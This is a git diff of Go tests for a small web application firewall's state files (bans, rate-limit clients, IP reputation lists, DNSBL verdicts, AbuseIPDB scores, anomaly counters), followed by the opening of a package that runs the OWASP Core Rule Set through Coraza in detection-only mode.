"netblock": "203.0.113.0/24",
"minute": {
"start": "2026-10-06T00:00:00Z",
"current": 1,
"previous": 0
}
},
{
"scope": "total",
"minute": {
"start": "2026-10-06T00:00:00Z",
"current": 1,
"previous": 0
},
"minute_bytes": {
"start": "2026-10-06T00:00:00Z",
"current": 8,
"previous": 0
}
},
{
"scope": "watch",
"netblock": "203.0.113.0/24",
"name": "office",
"hour": {
"start": "2026-10-06T00:00:00Z",
"current": 1,
"previous": 0
}
}
]
}
`
// filledReputationJSON is reputation.json holding the blocklists' last
// tries and the copy of one, with its comment line, two verdicts of a
// DNSBL zone, and the AbuseIPDB checks spent today with two scores, as
// fill puts them in.
const filledReputationJSON = `{
"version": 1,
"lists": [
{
"url": "https://lists.example/drop.txt",
"tried": "2026-10-06T00:00:00Z",
"fetched": "2026-10-05T23:00:00Z",
"lines": [
"; Spamhaus DROP List 2026/10/05 - (c) 2026 The Spamhaus Project SLL",
"203.0.113.0/24 ; SBL1",
"2001:db8::/32 ; SBL2"
]
},
{
"url": "https://lists.example/tor.txt",
"tried": "2026-10-06T00:00:00Z"
}
],
"verdicts": [
{
"zone": "dnsbl.example",
"client": "203.0.113.9",
"listed": true,
"fetched": "2026-10-05T23:00:00Z"
},
{
"zone": "dnsbl.example",
"client": "2001:db8::1",
"listed": false,
"fetched": "2026-10-05T22:00:00Z"
}
],
"abuseipdb": {
"day": "2026-10-06T00:00:00Z",
"spent": 3,
"scores": [
{
"client": "203.0.113.9/32",
"score": 100,
"fetched": "2026-10-05T23:00:00Z"
},
{
"client": "2001:db8::/64",
"score": 0,
"fetched": "2026-10-05T22:00:00Z"
}
]
} }
} }
` `
@@ -183,18 +302,52 @@ func TestFilesWrittenAndReadBack(t *testing.T) {
wantEqual(t, clientsJSON, after.Limiter.Snapshot(), before.Limiter.Snapshot()) wantEqual(t, clientsJSON, after.Limiter.Snapshot(), before.Limiter.Snapshot())
wantEqual(t, lookupsJSON, after.GeoJS.Snapshot(), before.GeoJS.Snapshot()) wantEqual(t, lookupsJSON, after.GeoJS.Snapshot(), before.GeoJS.Snapshot())
if got, want := after.Lists.Snapshot(), before.Lists.Snapshot(); !reflect.DeepEqual(
got, want) {
t.Errorf("%s read back\n%+v\nwant\n%+v", reputationJSON, got, want)
}
wantEqual(t, reputationJSON, after.DNSBL.Snapshot(), before.DNSBL.Snapshot())
checks, wantChecks := after.AbuseIPDB.Snapshot(), before.AbuseIPDB.Snapshot()
if !reflect.DeepEqual(checks, wantChecks) {
t.Errorf("%s read back\n%+v\nwant\n%+v", reputationJSON, checks, wantChecks)
}
if got, want := after.Alerts.Snapshot(), before.Alerts.Snapshot(); !reflect.DeepEqual( if got, want := after.Alerts.Snapshot(), before.Alerts.Snapshot(); !reflect.DeepEqual(
got, want) { got, want) {
t.Errorf("%s read back\n%+v\nwant\n%+v", alertsJSON, got, want) t.Errorf("%s read back\n%+v\nwant\n%+v", alertsJSON, got, want)
} }
wantEqual(t, alertsJSON, after.Anomalies.Snapshot(), before.Anomalies.Snapshot())
// Each one-per-line file lists its entries by client, and nothing // Each one-per-line file lists its entries by client, and nothing
// but the four files is left in the directory. // but the five files is left in the directory.
wantEntries(t, filepath.Join(dir, clientsJSON), "clients", wantEntries(t, filepath.Join(dir, clientsJSON), "clients",
"192.0.2.1/32", "203.0.113.9/32", "2001:db8::/64") "192.0.2.1/32", "203.0.113.9/32", "2001:db8::/64")
wantEntries(t, filepath.Join(dir, lookupsJSON), "lookups", wantEntries(t, filepath.Join(dir, lookupsJSON), "lookups",
"192.0.2.1/32", "203.0.113.9/32") "192.0.2.1/32", "203.0.113.9/32")
wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON) wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON, reputationJSON)
}
func TestReputationJSONKeepsEachCopyWholeOneLineToALine(t *testing.T) {
t.Parallel()
dir := t.TempDir()
params := newParams(dir)
fill(params)
files := load(t, params)
err := files.WriteAll()
if err != nil {
t.Fatalf("write: %v", err)
}
got := readFile(t, filepath.Join(dir, reputationJSON))
if got != filledReputationJSON {
t.Errorf("reputation.json\n%s\nwant\n%s", got, filledReputationJSON)
}
} }
func TestAlertsJSONIsIndentedWithTheCooldownsTheHourAndTheAlertsWaiting(t *testing.T) { func TestAlertsJSONIsIndentedWithTheCooldownsTheHourAndTheAlertsWaiting(t *testing.T) {
@@ -248,6 +401,49 @@ func TestSourceFailureCooldownKeptInAlertsJSONAcrossARestart(t *testing.T) {
} }
} }
func TestAnomalyCountersKeptInAlertsJSONAcrossARestart(t *testing.T) {
t.Parallel()
dir := t.TempDir()
request := anomaly.Request{
Client: netip.MustParseAddr("203.0.113.9"),
ClientGroup: netip.MustParsePrefix("203.0.113.9/32"),
}
// The whole service may have two requests a minute.
withThreshold := func() state.Params {
params := newParams(dir)
params.Anomalies = anomaly.New(anomaly.Params{
Total: anomaly.Thresholds{RequestsPerMinute: 2}, Alerts: params.Alerts,
})
return params
}
before := withThreshold()
files := load(t, before)
for range 2 {
before.Anomalies.Count(midnight(), request)
}
err := files.WriteAll()
if err != nil {
t.Fatalf("write: %v", err)
}
// After the restart, the third request in the minute is over it.
after := withThreshold()
load(t, after)
after.Anomalies.Count(midnight(), request)
waiting := after.Alerts.Snapshot().Waiting[alerts.DestinationWebhook]
if len(waiting) != 1 || waiting[0].Event != alerts.EventAnomaly ||
waiting[0].Detail["count"] != float64(3) {
t.Errorf("alerts wait %+v, want one for 3 requests", waiting)
}
}
func TestBansJSONIsIndentedWithNullForAPermanentBan(t *testing.T) { func TestBansJSONIsIndentedWithNullForAPermanentBan(t *testing.T) {
t.Parallel() t.Parallel()
@@ -275,9 +471,13 @@ func TestMissingFilesAreEmptyState(t *testing.T) {
load(t, params) load(t, params)
held := params.Alerts.Snapshot() held := params.Alerts.Snapshot()
checks := params.AbuseIPDB.Snapshot()
if len(params.Ledger.Snapshot()) != 0 || len(params.Limiter.Snapshot()) != 0 || if len(params.Ledger.Snapshot()) != 0 || len(params.Limiter.Snapshot()) != 0 ||
len(params.GeoJS.Snapshot()) != 0 || len(held.Cooldowns) != 0 || len(params.GeoJS.Snapshot()) != 0 || len(params.Lists.Snapshot()) != 0 ||
len(held.Waiting[alerts.DestinationWebhook]) != 0 || held.Hour.Sent != 0 { len(params.DNSBL.Snapshot()) != 0 || len(checks.Scores) != 0 || checks.Spent != 0 ||
len(held.Cooldowns) != 0 || len(held.Waiting[alerts.DestinationWebhook]) != 0 ||
held.Hour.Sent != 0 {
t.Error("state from no files") t.Error("state from no files")
} }
} }
@@ -329,6 +529,21 @@ func TestFileThatDoesNotParseStopsTheStart(t *testing.T) {
`{"version": 1, "waiting": {"webhook": [], "slak": []}}`, `{"version": 1, "waiting": {"webhook": [], "slak": []}}`,
`: waiting "slak" is not webhook, slack or ntfy`, `: waiting "slak" is not webhook, slack or ntfy`,
}, },
{
"an anomaly counter of an unknown scope", alertsJSON,
`{"version": 1, "anomaly_counters": [{"scope": "total"}, ` +
`{"scope": "nett", "netblock": "203.0.113.0/24"}]}`,
`: anomaly_counters entry 2's scope "nett" is not client, net, asn, total ` +
`or watch`,
},
{
"a copy of a list with a line that does not read", reputationJSON,
`{"version": 1, "lists": [{"url": "` + blocklistURL + `", ` +
`"tried": "2026-10-06T00:00:00Z", "fetched": "2026-10-06T00:00:00Z", ` +
`"lines": ["; DROP", "203.0.113.300"]}]}`,
`: the copy of ` + blocklistURL + `: line 2 is not an address or a netblock, ` +
`such as 192.0.2.0/24`,
},
} { } {
t.Run(tc.name, func(t *testing.T) { t.Run(tc.name, func(t *testing.T) {
t.Parallel() t.Parallel()
@@ -392,6 +607,12 @@ func TestEntryWithoutAFieldItNeedsStopsTheStart(t *testing.T) {
`"hour": {"current": 3}}]}`, `"hour": {"current": 3}}]}`,
`: entry 1 has no "hour.start"`, `: entry 1 has no "hour.start"`,
}, },
{
"a client with bytes in a window without its start", clientsJSON,
`{"version": 1, "clients": [{"client": "203.0.113.9/32", ` +
`"minute_bytes": {"previous": 5120}}]}`,
`: entry 1 has no "minute_bytes.start"`,
},
{ {
"an answer without a client", lookupsJSON, "an answer without a client", lookupsJSON,
`{"version": 1, "lookups": [{"country": "DE", ` + answer + `}]}`, `{"version": 1, "lookups": [{"country": "DE", ` + answer + `}]}`,
@@ -418,6 +639,130 @@ func TestEntryWithoutAFieldItNeedsStopsTheStart(t *testing.T) {
} }
} }
func TestClientWithRefusalsInTheMinuteWithoutTheirStartStopsTheStart(t *testing.T) {
t.Parallel()
wantRefused(t, clientsJSON,
`{"version": 1, "clients": [{"client": "203.0.113.9/32", `+
`"minute_refusals": {"current": 2}}]}`,
`: entry 1 has no "minute_refusals.start"`)
}
func TestReputationJSONEntryWithoutAFieldItNeedsStopsTheStart(t *testing.T) {
t.Parallel()
const (
drop = `"url": "` + blocklistURL + `", `
tried = `"tried": "2026-10-06T00:00:00Z", `
fetched = `"fetched": "2026-10-06T00:00:00Z"`
// verdictZone, verdictClient and listed start a verdict, which
// fetched ends.
verdictZone = `"zone": "` + dnsblZone + `", `
verdictClient = `"client": "198.51.100.7", `
listed = `"listed": false, `
)
for _, tc := range []struct {
name, content string
// want is what the error says after the file's path.
want string
}{
{
"a list without its URL",
`{"version": 1, "lists": [{` + tried + fetched + `, "lines": []}]}`,
`: entry 1 has no "url"`,
},
{
"a list without the time it was last tried",
`{"version": 1, "lists": [{` + drop + fetched + `, "lines": []}]}`,
`: entry 1 has no "tried"`,
},
{
"a copy of a list without the time it was fetched",
`{"version": 1, "lists": [{` + drop + tried + `"lines": []}]}`,
`: entry 1 has no "fetched"`,
},
{
// An empty list has no lines, which is not having none.
"a copy of a list without its lines",
`{"version": 1, "lists": [{` + drop + tried + fetched + `, "lines": []}, ` +
`{"url": "` + torURL + `", ` + tried + fetched + `}]}`,
`: entry 2 has no "lines"`,
},
{
"a verdict without its zone",
`{"version": 1, "verdicts": [{` + verdictClient + listed + fetched + `}]}`,
`: verdicts entry 1 has no "zone"`,
},
{
"a verdict without its client",
`{"version": 1, "verdicts": [{` + verdictZone + listed + fetched + `}]}`,
`: verdicts entry 1 has no "client"`,
},
{
// A client the zone does not list has a listed of false, which is
// not having none.
"a verdict without whether the zone lists the client",
`{"version": 1, "verdicts": [{` + verdictZone + verdictClient + listed +
fetched + `}, {` + verdictZone + verdictClient + fetched + `}]}`,
`: verdicts entry 2 has no "listed"`,
},
{
"a verdict without the time it was fetched",
`{"version": 1, "verdicts": [{` + verdictZone + verdictClient +
`"listed": true}]}`,
`: verdicts entry 1 has no "fetched"`,
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
wantRefused(t, reputationJSON, tc.content, tc.want)
})
}
}
func TestReputationJSONScoreWithoutAFieldItNeedsStopsTheStart(t *testing.T) {
t.Parallel()
// scores opens the list of AbuseIPDB scores, and ends closes it; client,
// score and fetched make a score.
const (
scores = `{"version": 1, "abuseipdb": {"scores": [`
client = `"client": "198.51.100.7/32", `
score = `"score": 0, `
fetched = `"fetched": "2026-10-06T00:00:00Z"`
ends = `}]}}`
)
for _, tc := range []struct {
name, content string
// want is what the error says after the file's path.
want string
}{
{
"without its client", scores + `{` + score + fetched + ends,
`: abuseipdb scores entry 1 has no "client"`,
},
{
// A score of 0 is not having none.
"without the score",
scores + `{` + client + score + fetched + `}, {` + client + fetched + ends,
`: abuseipdb scores entry 2 has no "score"`,
},
{
"without the time it was fetched", scores + `{` + client + `"score": 100` + ends,
`: abuseipdb scores entry 1 has no "fetched"`,
},
} {
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
wantRefused(t, reputationJSON, tc.content, tc.want)
})
}
}
func TestAlertsJSONEntryWithoutAFieldItNeedsStopsTheStart(t *testing.T) { func TestAlertsJSONEntryWithoutAFieldItNeedsStopsTheStart(t *testing.T) {
t.Parallel() t.Parallel()
@@ -446,6 +791,39 @@ func TestAlertsJSONEntryWithoutAFieldItNeedsStopsTheStart(t *testing.T) {
`{"version": 1, "waiting": {"slack": [{"event": "ban"}]}}`, `{"version": 1, "waiting": {"slack": [{"event": "ban"}]}}`,
`: waiting slack entry 1 has no "time"`, `: waiting slack entry 1 has no "time"`,
}, },
{
// The whole service's counter needs nothing to tell it apart.
"an anomaly counter of a netblock without it",
`{"version": 1, "anomaly_counters": [{"scope": "total"}, {"scope": "net"}]}`,
`: anomaly_counters entry 2 has no "netblock"`,
},
{
"an anomaly counter of a client without its netblock",
`{"version": 1, "anomaly_counters": [{"scope": "client"}]}`,
`: anomaly_counters entry 1 has no "netblock"`,
},
{
"an anomaly counter of an AS number without it",
`{"version": 1, "anomaly_counters": [{"scope": "asn"}]}`,
`: anomaly_counters entry 1 has no "asn"`,
},
{
"an anomaly counter of a named netblock without its name",
`{"version": 1, "anomaly_counters": [` +
`{"scope": "watch", "netblock": "203.0.113.0/24"}]}`,
`: anomaly_counters entry 1 has no "name"`,
},
{
"an anomaly counter of a named netblock without its netblock",
`{"version": 1, "anomaly_counters": [{"scope": "watch", "name": "office"}]}`,
`: anomaly_counters entry 1 has no "netblock"`,
},
{
"an anomaly counter with bytes in a window without its start",
`{"version": 1, "anomaly_counters": [` +
`{"scope": "total", "hour_bytes": {"current": 5}}]}`,
`: anomaly_counters entry 1 has no "hour_bytes.start"`,
},
} { } {
t.Run(tc.name, func(t *testing.T) { t.Run(tc.name, func(t *testing.T) {
t.Parallel() t.Parallel()
@@ -481,14 +859,18 @@ func TestBanWithAnotherCauseStopsTheStart(t *testing.T) {
`{"netblock": "203.0.113.10/32", "start": "2026-10-06T00:00:00Z", `+ `{"netblock": "203.0.113.10/32", "start": "2026-10-06T00:00:00Z", `+
`"expires": null, "cause": "admin"}, `+ `"expires": null, "cause": "admin"}, `+
`{"netblock": "203.0.113.11/32", "start": "2026-10-06T00:00:00Z", `+ `{"netblock": "203.0.113.11/32", "start": "2026-10-06T00:00:00Z", `+
`"expires": "2026-10-06T04:00:00Z", "cause": "crowdsec"}, `+
`{"netblock": "203.0.113.12/32", "start": "2026-10-06T00:00:00Z", `+
`"expires": null, "cause": "atack"}]}`, `"expires": null, "cause": "atack"}]}`,
`: entry 3's cause "atack" is not limit, attack or admin`) `: entry 4's cause "atack" is not limit, attack, admin or crowdsec`)
} }
func TestUnknownVersionStopsTheStart(t *testing.T) { func TestUnknownVersionStopsTheStart(t *testing.T) {
t.Parallel() t.Parallel()
for _, file := range []string{bansJSON, clientsJSON, lookupsJSON, alertsJSON} { for _, file := range []string{
bansJSON, clientsJSON, lookupsJSON, reputationJSON, alertsJSON,
} {
for _, content := range []string{`{"version": 2}`, `{}`} { for _, content := range []string{`{"version": 2}`, `{}`} {
t.Run(file+" "+content, func(t *testing.T) { t.Run(file+" "+content, func(t *testing.T) {
t.Parallel() t.Parallel()
@@ -558,7 +940,7 @@ func TestBansWrittenOnceWriteDelayAfterABan(t *testing.T) {
load(t, read) load(t, read)
want := []bans.Ban{first, second} want := []bans.Ban{first, second}
if got := read.Ledger.Snapshot(); !slices.Equal(got, want) { if got := read.Ledger.Snapshot(); !reflect.DeepEqual(got, want) {
t.Errorf("bans.json holds %+v, want %+v", got, want) t.Errorf("bans.json holds %+v, want %+v", got, want)
} }
@@ -590,8 +972,9 @@ func TestEveryFileWrittenEveryCounterInterval(t *testing.T) {
time.Sleep(time.Nanosecond) time.Sleep(time.Nanosecond)
synctest.Wait() synctest.Wait()
wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON) wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON, reputationJSON)
removeFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON) removeFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON,
reputationJSON)
} }
}) })
} }
@@ -707,7 +1090,7 @@ func TestFailedWriteLeavesTheFileAsItWas(t *testing.T) {
params.Ledger.BanForLimit(netip.MustParsePrefix("203.0.113.9/32"), midnight(), params.Ledger.BanForLimit(netip.MustParsePrefix("203.0.113.9/32"), midnight(),
bans.Notes{}) bans.Notes{})
params.Limiter.Count(netip.MustParsePrefix("203.0.113.9/32"), midnight()) params.Limiter.Count(netip.MustParsePrefix("203.0.113.9/32"), midnight(), whole)
err = files.WriteAll() err = files.WriteAll()
if err == nil || !strings.Contains(err.Error(), bansJSON+".tmp") { if err == nil || !strings.Contains(err.Error(), bansJSON+".tmp") {
@@ -810,7 +1193,7 @@ func TestFileThatCannotBeReadIsNotWrittenOver(t *testing.T) {
t.Errorf("bans.json is now %v (%v), want the socket", info, err) t.Errorf("bans.json is now %v (%v), want the socket", info, err)
} }
wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON) wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON, reputationJSON)
wantWriteFailed(t, params, bansJSON) wantWriteFailed(t, params, bansJSON)
} }
@@ -883,6 +1266,32 @@ func TestEditOfEachFileTakenIn(t *testing.T) {
wantEqual(t, lookupsJSON, params.GeoJS.Snapshot(), wantEqual(t, lookupsJSON, params.GeoJS.Snapshot(),
[]lookup.Answer{{Client: client, Country: "FR", Answered: midnight()}}) []lookup.Answer{{Client: client, Country: "FR", Answered: midnight()}})
edit(t, dir, reputationJSON, `{"version": 1, "lists": [{"url": "`+blocklistURL+`", `+
`"tried": "2026-10-06T00:00:00Z", "fetched": "2026-10-06T00:00:00Z", `+
`"lines": ["198.51.100.7"]}], "verdicts": [{"zone": "`+dnsblZone+`", `+
`"client": "198.51.100.7", "listed": true, "fetched": "2026-10-06T00:00:00Z"}], `+
`"abuseipdb": {"day": "2026-10-06T00:00:00Z", "spent": 9, "scores": [`+
`{"client": "198.51.100.7/32", "score": 80, "fetched": "2026-10-06T00:00:00Z"}]}}`)
wantTakenIn(t, lines, dir, reputationJSON)
listedBy := params.Lists.ListedBy(client.Addr())
if !slices.Equal(listedBy, []string{blocklistURL}) {
t.Errorf("%s taken in lists %s on %v, want on the blocklist", reputationJSON,
client.Addr(), listedBy)
}
wantEqual(t, reputationJSON, params.DNSBL.Snapshot(), []reputation.Verdict{{
Zone: dnsblZone, Client: client.Addr(), Listed: true, Fetched: midnight(),
}})
checks := reputation.Checks{
Day: midnight(), Spent: 9,
Scores: []reputation.Score{{Client: client, Score: 80, Fetched: midnight()}},
}
if got := params.AbuseIPDB.Snapshot(); !reflect.DeepEqual(got, checks) {
t.Errorf("%s taken in as\n%+v\nwant\n%+v", reputationJSON, got, checks)
}
// A netblock with bits past its length is read as the netblock it is // A netblock with bits past its length is read as the netblock it is
// in. // in.
edit(t, dir, alertsJSON, `{"version": 1, "cooldowns": [{"event": "ban", `+ edit(t, dir, alertsJSON, `{"version": 1, "cooldowns": [{"event": "ban", `+
@@ -1110,7 +1519,7 @@ func TestBrokenEditSetAsideAtTheNextWrite(t *testing.T) {
edit(t, dir, bansJSON, broken) edit(t, dir, bansJSON, broken)
edit(t, dir, clientsJSON, `{"version": 1, "clients": []}`) edit(t, dir, clientsJSON, `{"version": 1, "clients": []}`)
wantTakenIn(t, lines, dir, clientsJSON) wantTakenIn(t, lines, dir, clientsJSON)
wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON) wantFiles(t, dir, alertsJSON, bansJSON, clientsJSON, lookupsJSON, reputationJSON)
// The next write sets it aside, logged with where the error is, and // The next write sets it aside, logged with where the error is, and
// writes bans.json again from what smallwebwaf still holds. // writes bans.json again from what smallwebwaf still holds.
@@ -1134,7 +1543,8 @@ func TestBrokenEditSetAsideAtTheNextWrite(t *testing.T) {
t.Errorf("alerts waiting %+v, want a file_error alert for %s", waiting, path+".bad") t.Errorf("alerts waiting %+v, want a file_error alert for %s", waiting, path+".bad")
} }
wantFiles(t, dir, alertsJSON, bansJSON, bansJSON+".bad", clientsJSON, lookupsJSON) wantFiles(t, dir, alertsJSON, bansJSON, bansJSON+".bad", clientsJSON, lookupsJSON,
reputationJSON)
if got := readFile(t, path+".bad"); got != broken { if got := readFile(t, path+".bad"); got != broken {
t.Errorf("bans.json.bad holds\n%s\nwant the edit", got) t.Errorf("bans.json.bad holds\n%s\nwant the edit", got)
@@ -1263,11 +1673,21 @@ func midnight() time.Time {
} }
// newParams returns Params for the state files in dir, with parts that // newParams returns Params for the state files in dir, with parts that
// hold nothing yet. GeoJS is never asked, and the alerts, at most two an // hold nothing yet. GeoJS is never asked, the lists, two blocklists, are
// hour, are never sent. // never fetched, and the alerts, at most two an hour, are
// never sent. The anomaly counters count the scopes fill counts, with
// thresholds fill does not reach.
func newParams(dir string) state.Params { func newParams(dir string) state.Params {
discard := slog.New(slog.DiscardHandler) discard := slog.New(slog.DiscardHandler)
m := metrics.New(1, "app") m := metrics.New(1, "app")
queue := alerts.New(alerts.Params{
WebhookURL: &url.URL{Scheme: "https", Host: "alerts.example"},
Events: alerts.Events(),
Cooldown: 15 * time.Minute,
MaxPerHour: 2,
Instance: "fsn1app1/gitea",
Now: midnight,
})
return state.Params{ return state.Params{
Dir: dir, Dir: dir,
@@ -1280,17 +1700,32 @@ func newParams(dir string) state.Params {
AttackBanDuration: 7 * 24 * time.Hour, AttackBanDuration: 7 * 24 * time.Hour,
MaxBans: 5000, MaxBans: 5000,
}), }),
Limiter: ratelimit.New(ratelimit.Limits{}), Limiter: ratelimit.New(ratelimit.Limits{}, 20000),
GeoJS: lookup.New(lookup.Params{ GeoJS: lookup.New(lookup.Params{
Now: midnight, ProcessLog: discard, Metrics: m, Now: midnight, ProcessLog: discard, Metrics: m,
}), }),
Alerts: alerts.New(alerts.Params{ Lists: reputation.New(reputation.Params{
WebhookURL: &url.URL{Scheme: "https", Host: "alerts.example"}, BlocklistURLs: []string{blocklistURL, torURL}, Refresh: 24 * time.Hour,
Events: alerts.Events(), Now: midnight, ProcessLog: discard, Alerts: queue,
Cooldown: 15 * time.Minute, }),
MaxPerHour: 2, DNSBL: reputation.NewDNSBL(reputation.DNSBLParams{
Instance: "fsn1app1/gitea", Zones: []string{dnsblZone}, CacheTTL: 24 * time.Hour, Timeout: time.Second,
Now: midnight, Now: midnight, ProcessLog: discard, Alerts: queue,
}),
AbuseIPDB: reputation.NewAbuseIPDB(reputation.AbuseIPDBParams{
MinScore: 75, DailyBudget: 900, CacheTTL: 24 * time.Hour, Timeout: time.Second,
Now: midnight, ProcessLog: discard, Alerts: queue,
}),
Alerts: queue,
Anomalies: anomaly.New(anomaly.Params{
Net: anomaly.Thresholds{RequestsPerMinute: 1000},
ASN: anomaly.Thresholds{BytesPerHour: 1 << 30},
Total: anomaly.Thresholds{RequestsPerMinute: 1000, BytesPerMinute: 1 << 30},
Watch: anomaly.Thresholds{RequestsPerHour: 1000},
NetV4Prefix: 24,
NetV6Prefix: 48,
NamedNetblocks: []anomaly.NamedNetblock{{Name: "office", Netblock: office()}},
Alerts: queue,
}), }),
Now: midnight, Now: midnight,
ProcessLog: discard, ProcessLog: discard,
@@ -1298,10 +1733,19 @@ func newParams(dir string) state.Params {
} }
} }
// fill puts a permanent ban an admin made, a ban for a broken limit and // office is the named netblock of the anomaly counters of newParams.
// one for a clear sign of attack, clients with counts and histories, func office() netip.Prefix {
// GeoJS answers, and alerts, as filledAlertsJSON holds them, into the return netip.MustParsePrefix("203.0.113.0/24")
// parts of params. }
// fill puts a permanent ban an admin made, a ban for a broken limit, one
// for a clear sign of attack and one for CrowdSec's decision, clients
// with counts and histories,
// GeoJS answers, the blocklists' last tries and the copy of one, two
// verdicts of a DNSBL zone, and the AbuseIPDB checks spent today with two
// scores, as filledReputationJSON holds them, and alerts
// and anomaly counters, as filledAlertsJSON holds them, into the parts of
// params.
func fill(params state.Params) { func fill(params state.Params) {
now := midnight() now := midnight()
client := netip.MustParsePrefix("203.0.113.9/32") client := netip.MustParsePrefix("203.0.113.9/32")
@@ -1312,11 +1756,14 @@ func fill(params state.Params) {
}) })
params.Ledger.BanForAttack(netip.MustParsePrefix("192.0.2.1/32"), now, params.Ledger.BanForAttack(netip.MustParsePrefix("192.0.2.1/32"), now,
bans.Notes{RuleID: "env-file", Target: "path"}) bans.Notes{RuleID: "env-file", Target: "path"})
params.Ledger.BanForCrowdSec(netip.MustParsePrefix("198.51.100.9/32"), now,
now.Add(4*time.Hour), "crowdsecurity/ssh-bf", bans.Notes{})
for _, c := range []string{"2001:db8::/64", "203.0.113.9/32", "192.0.2.1/32"} { for _, c := range []string{"2001:db8::/64", "203.0.113.9/32", "192.0.2.1/32"} {
params.Limiter.Count(netip.MustParsePrefix(c), now) params.Limiter.Count(netip.MustParsePrefix(c), now, whole)
} }
params.Limiter.CountBytes(client, now, 8, whole)
params.Limiter.AddToHistory(client, now, ratelimit.Request{ params.Limiter.AddToHistory(client, now, ratelimit.Request{
Forwarded: true, Status: 200, RequestBytes: 3, ResponseBytes: 5, Forwarded: true, Status: 200, RequestBytes: 3, ResponseBytes: 5,
}) })
@@ -1333,6 +1780,32 @@ func fill(params state.Params) {
}, },
}) })
// The copy of drop.txt was fetched an hour ago, and the fetches of it
// and of tor.txt tried since failed.
err := params.Lists.Load([]reputation.List{{
URL: blocklistURL, Tried: now, Fetched: now.Add(-time.Hour),
Lines: []string{
"; Spamhaus DROP List 2026/10/05 - (c) 2026 The Spamhaus Project SLL",
"203.0.113.0/24 ; SBL1",
"2001:db8::/32 ; SBL2",
},
}, {URL: torURL, Tried: now}})
if err != nil {
panic(err) // the copy reads
}
params.DNSBL.Load([]reputation.Verdict{
{
Zone: dnsblZone, Client: netip.MustParseAddr("2001:db8::1"),
Fetched: now.Add(-2 * time.Hour),
},
{Zone: dnsblZone, Client: client.Addr(), Listed: true, Fetched: now.Add(-time.Hour)},
})
params.AbuseIPDB.Load(reputation.Checks{Day: now, Spent: 3, Scores: []reputation.Score{
{Client: netip.MustParsePrefix("2001:db8::/64"), Fetched: now.Add(-2 * time.Hour)},
{Client: client, Score: 100, Fetched: now.Add(-time.Hour)},
}})
// An alert waiting, a repeat of it the cooldown holds back, another // An alert waiting, a repeat of it the cooldown holds back, another
// alert waiting, and one past the two an hour, for the hour's summary. // alert waiting, and one past the two an hour, for the hour's summary.
ban := alerts.Alert{ ban := alerts.Alert{
@@ -1351,10 +1824,16 @@ func fill(params state.Params) {
params.Alerts.Raise(alerts.Alert{ params.Alerts.Raise(alerts.Alert{
Event: alerts.EventSourceFailure, Reason: "asking GeoJS failed", Event: alerts.EventSourceFailure, Reason: "asking GeoJS failed",
}) })
params.Anomalies.Count(now, anomaly.Request{
Client: client.Addr(), ClientGroup: client, ASN: asn, Bytes: 8,
})
} }
// permanentBan is the ban permanentBansJSON holds. // permanentBan is the ban permanentBansJSON holds.
func permanentBan() bans.Ban { func permanentBan() bans.Ban {
score := int64(100)
return bans.Ban{ return bans.Ban{
Netblock: netip.MustParsePrefix("2001:db8::/64"), Netblock: netip.MustParsePrefix("2001:db8::/64"),
Start: midnight(), Start: midnight(),
@@ -1367,6 +1846,9 @@ func permanentBan() bans.Ban {
Limit: 1000, Limit: 1000,
Window: "minute", Window: "minute",
Count: 1000.5, Count: 1000.5,
Reputation: []bans.ReputationHit{
{Source: blocklistURL}, {Source: reputation.AbuseIPDBSource, Score: &score},
},
Request: bans.Request{ Request: bans.Request{
Time: midnight(), Time: midnight(),
Method: "GET", Method: "GET",
@@ -1377,7 +1859,7 @@ func permanentBan() bans.Ban {
}, },
Requests: 1500, Requests: 1500,
Refused: 3, Refused: 3,
EarlierBans: bans.EarlierBans{Limit: 3, Attack: 1, Admin: 1}, EarlierBans: bans.EarlierBans{Limit: 3, Attack: 1, Admin: 1, CrowdSec: 2},
}, },
} }
} }
@@ -1542,10 +2024,10 @@ func edit(t *testing.T, dir, name, content string) {
// wantEqual checks that the entries read back from file are those // wantEqual checks that the entries read back from file are those
// written. // written.
func wantEqual[E comparable](t *testing.T, file string, got, want []E) { func wantEqual[E any](t *testing.T, file string, got, want []E) {
t.Helper() t.Helper()
if !slices.Equal(got, want) { if !reflect.DeepEqual(got, want) {
t.Errorf("%s read back\n%+v\nwant\n%+v", file, got, want) t.Errorf("%s read back\n%+v\nwant\n%+v", file, got, want)
} }
} }
+336
View File
@@ -0,0 +1,336 @@
// Package waf runs the OWASP Core Rule Set 4.25.0, through Coraza, on the
// method, the URL with its query and the headers of a request, and on its
// body while SWWAF_WAF_BODY_LIMIT is set, with the six changes smallwebwaf
// makes to it, as "Attack detection" under "Configuration surface" in
// SPEC.md describes them. It reads no response.
//
// smallwebwaf writes only to its state directory, so Coraza is built with
// its no_fs_access tag, as the Dockerfile and script/build build it: of a
// file in a multipart body, Coraza then counts the bytes instead of
// writing them to the system's temporary directory.
package waf
import (
"fmt"
"io"
"net/http"
"net/netip"
"slices"
"strconv"
"strings"
coreruleset "github.com/corazawaf/coraza-coreruleset/v4"
"github.com/corazawaf/coraza/v3"
"github.com/corazawaf/coraza/v3/experimental/plugins/plugintypes"
"github.com/corazawaf/coraza/v3/types"
)
// directives are the Core Rule Set as smallwebwaf runs it, with the
// paranoia level for %d, and bodyDirectives for %s while
// SWWAF_WAF_BODY_LIMIT is set. Each rule smallwebwaf adds has an id from
// 900000 to 900999, the ids the Core Rule Set keeps for the rules that set
// it up, which SWWAF_WAF_DISABLED_RULES refuses, so that no setting
// switches one off. Coraza joins a line ending in \ to the next, without
// the spaces at the start of the next.
const directives = `
# The engine only detects. smallwebwaf compares the request's anomaly
# score with SWWAF_WAF_ANOMALY_THRESHOLD itself, in block and detect mode
# alike. It reads no body, unless bodyDirectives switch that on.
SecRuleEngine DetectionOnly
SecRequestBodyAccess Off
SecResponseBodyAccess Off
Include @crs-setup.conf.example
SecAction "id:900000,phase:1,pass,nolog,\
setvar:tx.blocking_paranoia_level=%d"
